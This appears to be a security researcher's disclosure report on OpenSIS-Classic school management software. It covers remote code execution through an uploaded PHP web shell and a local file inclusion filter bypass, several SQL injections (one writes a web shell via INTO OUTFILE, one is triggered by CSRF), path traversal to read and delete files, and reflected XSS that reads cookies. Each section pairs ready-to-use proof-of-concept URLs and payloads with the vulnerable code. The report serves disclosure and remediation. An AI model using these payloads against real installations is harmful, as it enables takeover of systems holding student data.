Vulnerabilities reported to OpenSIS
Some months ago I reported many vulnerabilties to OpenSIS (https://github.com/OS4ED/openSIS-Classic) they claim to have fixed all vulnerabilities (https://github.com/OS4ED/openSIS-Classic/issues/291) so this is my original report with all updates.
RCE via LFI
Description
By default the application allow staff users to upload txt (and images, pdf, excel files). Using the file upload functionality is possible to upload a php file with a .txt content, if we have a LFI we can access the php.txt file and execute the code inside it.
I upload a hidden video on my youtube channel (unlisted, need the url to see the video) showing how to exploit the vulnerabilty because is a little complex, I hope the video can help.
Video Poc: https://youtu.be/n-cu-1JTO6c
I'am Brazilian, my english is not the best sorry.
Proof of Concept
rce.txt file, we need to upload this file using the Files functionality
<?php
$x = system($_GET['cmd']);
header('X-Command-LFI: ' . $x);
?>
The files we upload are stored inside assets/stafffiles and the file name will be {UserID}-name.txt, if a user with id 10 upload a file called info.txt, the file will be: assets/stafffiles/10-info.txt
LFI and filter bypass
The LFI is in the Bottom.php file via the modname parameter on line 53
ob_start();
include('modules/'.sqlSecurityFilter($modname));
if($htmldocPath)
Was we can see, the application will use a function called sqlSecurityFilter in our parameter before the call to include, if we analyze this function, we will see that the function filter the '../' string, so we cannot use this string to exploit the LFI. In Windows systems is possible to exploit LFI vulnerabilities using '..\" instead of '../'.
To exploit this for command execution we need to upload the file and use the LFI to access the file.
PoC
http://localhost/openSIS-CE/Bottom.php?modfunc=print&modname=..\\assets\\stafffiles\\6-rcelfipoc.txt&cmd=whoami
Impact
Remote code execution
Occurrences
Bottom.php L53
LFI
ob_start();
include('modules/'.sqlSecurityFilter($modname));
if($htmldocPath)
Filter, functions/SqlSecurityFnc.php:38
$injectionParams = array('union ', 'select ', 'concat', 'concat_ws', 'create ', 'update ', 'insert ', 'delete ', 'extract ', 'drop ', 'truncate ', 'where ', 'trim ', 'format ', 'union%20', 'select%20', 'create%20', 'update%20', 'insert%20', 'delete%20', 'extract%20', 'drop%20', 'truncate%20', 'where%20', 'trim%20', 'format%20', ';', '\'', '--', '../', '..%2f', 'skip-grant-tables', 'sleep(', 'sleep (');
Multiple SQL Injections
Description
This vulnerability allow low level users to execute SQL commands. It is possible to create a CSRF PoC to perform the attack, so authentication is not really necessary. Its also possible to get RCE if the database user has permission to execute "INTO OUTFILE" command.
Proof of Concept
SQLi PoC:
http://[Host+openSIS-CE directory]/DownloadWindow.php?down_id=a'union+select+1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL--+-
Example version():
http://localhost/openSIS-CE/DownloadWindow.php?down_id=a'union+select+1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL--+-
Example INTO OUTFILE:
http://localhost/openSIS-CE/DownloadWindow.php?down_id=a'union+select+1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'<?php%20system($_GET["cmd"]);?>',NULL+into+outfile+'C:\\xampp\\htdocs\\openSIS-CE\\pocsqlcsrf.php
CSRF PoC + RCE using "INTO OUTFILE"
<a href="http://localhost/openSIS-CE/DownloadWindow.php?down_id=a'union+select+1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'<?php%20system($_GET[\'cmd\']);?>',NULL+into+outfile+'C:\\xampp\\htdocs\\openSIS-CE\\pocsqlcsrf.php" class="link">Link</a>
<script>
document.getElementsByClassName("link")[0].click();
</script>
Impact
run SQL commands and gain access to the database. If the SQL user has high privileges, it is possible to execute operating system commands
Occurrences
Group.php L831
modules/messaging/Group.php line 831 is vulnerable to SQL Injection in the groupid parameter
if (isset($_REQUEST['group'])) {
if (implode(',', $_REQUEST['group']) == '') {
$select = "select * from mail_groupmembers where group_id=" . $_REQUEST['groupid'];
$list = DBGet(DBQuery($select));
foreach ($list as $m => $n) {
if ($list[$m]['ID'])
$del_id[] = $list[$m]['ID'];
}
Group.php L859
modules/messaging/Group.php line 859 is vulnerable to SQL Injection in the groupid parameter
if ($id2 == $id3)
echo "<script>load_link('Modules.php?modname=" . strip_tags(trim($_REQUEST[modname])) . "')</script>";
else {
$select = "SELECT * FROM mail_groupmembers WHERE GROUP_ID=$_REQUEST[groupid] AND ID NOT IN($id2)";
$list = DBGet(DBQuery($select));
foreach ($list as $i => $j) {
$del_id1[] = $list[$i]['ID'];
}
ForExport.php L132-L141
Adding the eleventh SQL injection, ForExport.php lines 132 to 141 via X-Forwarded-For header
PoC to Exploit (youneed to be logged, change my PHPSESSID for yours)
GET /openSIS-CE/ForExport.php?modname=attack HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
X-Forwarded-For: 127.0.0.1',NULL,sleep(10),version(),version(),NULL,NULL,NULL)-- -
Cookie: PHPSESSID=aq1lsi8jce1v8v94b655v8qpcc
Vulnerabiltity ForExport.php lines 132-141
if ($_SERVER['HTTP_X_FORWARDED_FOR']){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
echo ""._youReNotAllowedToUseThisProgram."! "._thisAttemptedViolationHasBeenLoggedAndYourIpAddressWasCaptured.".";
DBQuery("INSERT INTO hacking_log (HOST_NAME,IP_ADDRESS,LOGIN_DATE,VERSION,PHP_SELF,DOCUMENT_ROOT,SCRIPT_NAME,MODNAME,USERNAME) values('$_SERVER[SERVER_NAME]','$ip','".date('Y-m-d')."','$openSISVersion','$_SERVER[PHP_SELF]','$_SERVER[DOCUMENT_ROOT]','$_SERVER[SCRIPT_NAME]','$_REQUEST[modname]','".User('USERNAME')."')");
We see that the $ip parameter is directly used in the SQL Query
Group.php L865
modules/messaging/Group.php line 865 is vulnerable to SQL Injection in the groupid parameter
$id = implode(',', $del_id1);
$select = "DELETE FROM mail_groupmembers WHERE GROUP_ID=$_REQUEST[groupid] AND ID IN($id)";
$not_in_group = DBQuery($select);
$mem_del = 'del';
unset($_REQUEST['modfunc']);
DownloadWindow.php L38
Has we can see, the vulnerability occurs due to lack of validation
if(isset($_REQUEST['down_id']) && $_REQUEST['down_id']!='')
{
if ((isset($_REQUEST['studentfile']) && $_REQUEST['studentfile'] == 'Y') || (isset($_REQUEST['userfile']) && $_REQUEST['userfile'] == 'Y'))
$downfile_info = DBGet(DBQuery('SELECT * FROM user_file_upload WHERE id=\'' . $_REQUEST['down_id'] . '\''));
else
$downfile_info = DBGet(DBQuery('SELECT * FROM user_file_upload WHERE download_id=\'' . $_REQUEST['down_id'] . '\''))
AttendanceCodes.php L237
Hi, another endpoint vulnerable to SQL Injection, now through the table parameter
} elseif ($_REQUEST['table'] !== 'new' && $_REQUEST['modfunc'] == 'edit') {
$code_cat = DBGet(DBQuery('SELECT TITLE FROM attendance_code_categories WHERE id=' . $_REQUEST['table']));
$code_cat = $code_cat[1]['TITLE'];
$_openSIS['selected_tab'] = "Modules.php?modname=$_REQUEST[modname]&table=$_REQUEST[table]";
Request to trigger the vulnerabiltiy
http://[openSIS Installation]/Ajax.php?modname=attendance/AttendanceCodes.php&modfunc=edit&id=5&ajax=true&table=0+union+select+sleep(10)
http://localhost/openSIS-CE/Ajax.php?modname=attendance/AttendanceCodes.php&modfunc=edit&id=5&ajax=true&table=0+union+select+sleep(10)
GenerateApi.php L45
Hi, another endpoint vulnerable to SQL Injection, now through the id parameter
if($_REQUEST['modfunc']=='remove')
{
DBQuery('DELETE FROM api_info WHERE ID='.$_REQUEST['id']);
}
Request to trigger the vulnerabiltiy
http://[OpenSIS Install]/Ajax.php?modname=tools/GenerateApi.php&modfunc=remove&id=1 or sleep(3)&ajax=true
http://localhost/openSIS-CE/Ajax.php?modname=tools/GenerateApi.php&modfunc=remove&id=1%20or%20sleep(3)&ajax=true
Group.php L848
modules/messaging/Group.php line 848 is vulnerable to SQL Injection in the groupid parameter
else {
$mem_del = '';
$not_select = "select * from mail_groupmembers where GROUP_ID=$_REQUEST[groupid]";
$list1 = DBGet(DBQuery($not_select));
foreach ($list1 as $i => $j) {
$id_list[] = $j['ID'];
}
Group.php L875
modules/messaging/Group.php line 875 is vulnerable to SQL Injection in the groupid parameter
$no_of_member = DBGet(DBQuery('SELECT * FROM mail_groupmembers WHERE GROUP_ID=' . $_REQUEST['groupid']));
if (count($no_of_member) == 0)
echo "<script>load_link('Modules.php?modname=" . strip_tags(trim($_REQUEST[modname])) . "')</script>";
else {
Group.php L880
modules/messaging/Group.php line 880 is vulnerable to SQL Injection in the groupid parameter
$mem_del = '';
$delect_member = "delete from mail_groupmembers where GROUP_ID=$_REQUEST[groupid]";
$delect_member_qry = DBQuery($delect_member);
$mem_del = 'del';
unset($_REQUEST['modfunc']);
Group.php L840
modules/messaging/Group.php line 840 is vulnerable to SQL Injection in the groupid parameter
$id = implode(',', $del_id);
$mem_del = '';
$select = "DELETE FROM mail_groupmembers WHERE GROUP_ID=$_REQUEST[groupid] AND ID IN($id)";
$not_in_group = DBQuery($select);
$mem_del = 'del';
unset($_REQUEST['modfunc']);
echo "<script>load_link_group('Modules.php?modname=messaging/Group.php','2')</script>";
Request example
http://localhost/openSIS-CE/Modules.php?modname=messaging/Group.php&modfunc=membPath Traversal to read files
Description
Hi, I founded a path traversall that allow me to read files in the application and operation system
Proof of Concept
Application:
http://localhost/openSIS-CE/DownloadWindow.php?filename=../Data.php
Windows OS:
http://localhost/openSIS-CE/DownloadWindow.php?filename=../../../../Windows/win.ini
Impact
File read access to the application and OS
Occurrences
DownloadWindow.php L75
{
header('Content-Disposition: attachment; filename="'.urldecode($_REQUEST['name']).'" ');
readfile('assets/'.urldecode($_REQUEST['filename']));
}Path Traversal to delete files
Description
Hi, I found a path traversall that allow me to delete any application file and files in the OS, the payload must be base64 encoded in the removefile parameter
Proof of Concept
target file = ../../PoC-Del.txt
http://localhost/openSIS-CE/Modules.php?modname=users/Staff.php&removefile=Li4vLi4vUG9DLURlbC50eHQ=&title=&include=FilesInc&modfunc=delete&delete_ok=1
target file = ../../../../PoC-OS-Level.txt
http://localhost/openSIS-CE/Modules.php?modname=users/Staff.php&removefile=Li4vLi4vLi4vLi4vUG9DLU9TLUxldmVsLnR4dA==&title=&include=FilesInc&modfunc=delete&delete_ok=1
Impact
Its possible to remove any file in the application, this allow me to break the entire application and remove OS files
Occurrences
Staff.php L679
Removefile parameter is not validated against path traversall
if ($_REQUEST['modfunc'] == 'delete' && $_REQUEST['include'] == 'FilesInc' && (User('PROFILE') == 'admin' || User('PROFILE') == 'teacher')) {
if (DeletePromptFilesEncoded($_REQUEST['title'], '&include=FilesInc&category_id=7')) {
unlink('assets/stafffiles/' . base64_decode($_REQUEST['removefile']));
DBQuery('DELETE FROM user_file_upload WHERE ID=' . $_REQUEST['del']);
unset($_REQUEST['modfunc']);
}Multiple XSS
Description
Hi, I notice the session cookie PHPSESSID is not Secure, so I find a reflected XSS in Validator.php lines 59 and 64 and I was able to access the cookie with the XSS attack.
Proof of Concept
http://localhost/openSIS-CE/validator.php?validate=pass_o&opt=<script>alert(document.cookie)</script>
Impact
A attacker can use this to steal users cookies and impersonate them, Account Take Over (ATO)
Occurrences
TransferredOutModal.php L130
Adding third XSS, student_id and drop_code parameters on TransferredOutModal.php line 130
PoC
http://localhost/openSIS-CE/TransferredOutModal.php?modfunc=detail&student_id=1"><script>alert(document.cookie)</script>&drop_code=1"><script>alert(document.domain)</script>
Vulnerable Code
echo '<input type="hidden" name="values[student_enrollment]['.$_REQUEST['student_id'].'][DROP_CODE]" value="'.$_REQUEST['drop_code'].'" />';
Validator.php L59-L64
The vulnerability occour here because the is no sanetization, you can use htmlentities() to prevente XSS
{
echo '1_'.$_GET['opt'];
}
else
{
echo '0_'.$_GET['opt'];
}
CoursePeriodModal.php L77
Adding second XSS, mode parameter in CoursePeriodModal.php
payload:
http://localhost/openSIS-CE/CoursePeriodModal.php?course_period_id=1&meet_date=1&cpv_id=1&subject_id=1&course_id=1&id=1&calendar_id=1&mode=c4v4r0n"><script>alert(document.cookie)</script>
Vulnerable code
}
//PopTableforWindow('header', $title);
echo "<FORM class=form-horizontal name=popform id=popform action=ForWindow.php?modname=schoolsetup/Courses.php&meet_date=" . $meet_date . "&modfunc=detail&mode=" . $_REQUEST['mode'] . "&subject_id=" . $subject_id . "&course_id=" . $course_id . "&course_period_id=" . $cp_id . "&calendar_id=" . $calendar_id . " METHOD=POST>";
echo '<div class="panel">';
echo '<div class="tabbable">';
DataImport.php L228
Adding the fourth XSS, file content in DataImport.php ($value variable)
We need to create a malicious xlsx file to exploit this vulnerabiltity. I uploaded a private video (access with url only) to my youtube account, so you can see how to exploit the vulnerability
Video PoC
https://youtu.be/G1cu-fy5-Cg
Vulnerable Field ($value variable)
if ($value)
echo "<tr class=" . $class . "><td class='" . $class . " p-t-20'>" . $value . "</td><td><div id='" . preg_replace('/[()\/]/', '', $value) . "' class='text-center p-t-15'></div></td><td class=" . $class . ">" . SelectInput($valuee, 'stu[' . $value . ']', '', $options, 'N/A', ' onchange=drawmapping(this.value,' . 'k' . $i . ',' . preg_replace('/[()\/]/', '', $value) . ');') . "</td></tr>";
echo "<input type='hidden' name='student_map_value[]' id=k$i>";
Malicious Excel content
<script>alert(document.cookie)</script> lname email
gon k email@a.com
kilua z email2@a.com
as an admin, access Tools -> Data Import Utility -> Import Student Data and upload the malicious xlsx file
